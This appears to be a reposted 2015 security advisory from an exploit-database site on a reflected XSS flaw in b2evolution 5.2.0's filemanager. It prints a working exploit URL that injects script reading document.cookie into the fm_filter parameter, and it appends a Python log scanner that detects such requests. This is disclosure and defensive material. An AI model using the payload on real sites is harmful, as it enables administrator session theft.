0day.today - Biggest Exploit Database in the World.
CMS b2evolution 5.2.0 Cross Site Scripting Vulnerability
Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v. 5.2.0
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflected XSS attacks.

==================
Technical Details:
==================

By appending arbitrary HTML and/or JavaScript code to the "fm_filter" parameter of the URL where the filemanager functionality of b2evolution is located, an attacker could trick an authenticated administrative user into executing the code.

The filemanager is located here on a common b2evolution installation:

http:// {TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

http:// {TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 - found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 - release date of this security advisory [without technical details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - sent to lists

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://b2evolution.net/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

# 0day.today [2024-12-25] #
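Since the advisory lists no vendor fix, one detection-side check is to scan web server access logs for filemanager requests whose "fm_filter" value decodes to HTML markup. The script below is an added example, not part of the advisory or of b2evolution; the function names and the log lines (combined log format, documentation IP ranges) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Characters that let an fm_filter value break out of an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_fm_filter(log_line):
    """Return the decoded fm_filter value if the request targets the
    filemanager (admin.php with ctrl=files) and carries markup, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "files" not in params.get("ctrl", []):
        return None
    for value in params.get("fm_filter", []):
        # parse_qs decodes once; decode a second time to catch double-encoded input.
        for candidate in (value, unquote(value)):
            if MARKUP.search(candidate):
                return candidate
    return None

# Constructed sample log lines; the third carries the advisory's example value.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jan/2015:10:02:11 +0000] "GET /blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&blog=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Jan/2015:10:02:40 +0000] "GET /blogs/admin.php?fm_filter=*.png&actionArray[filter]=Apply&ctrl=files&blog=1 HTTP/1.1" 200 5301',
    '203.0.113.9 - - [13/Jan/2015:10:05:02 +0000] "GET /blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&blog=1 HTTP/1.1" 200 5477',
    '203.0.113.9 - - [13/Jan/2015:10:05:30 +0000] "GET /blogs/admin.php?fm_filter=%2522%253E%253Cb%253E&ctrl=files&blog=1 HTTP/1.1" 200 5400',
    '203.0.113.9 - - [13/Jan/2015:10:06:00 +0000] "GET /blogs/index.php?fm_filter=%3Cb%3E HTTP/1.1" 200 900',
]

def scan(lines):
    """Return (line index, decoded fm_filter value) for every flagged line."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := suspicious_fm_filter(line))]

if __name__ == "__main__":
    for idx, value in scan(SAMPLE_LOG):
        print(f"line {idx}: fm_filter={value!r}")
```

A hit means a request was made, not that an administrator's browser ran the script; correlate flagged lines with the referrer and the authenticated session before treating them as an incident.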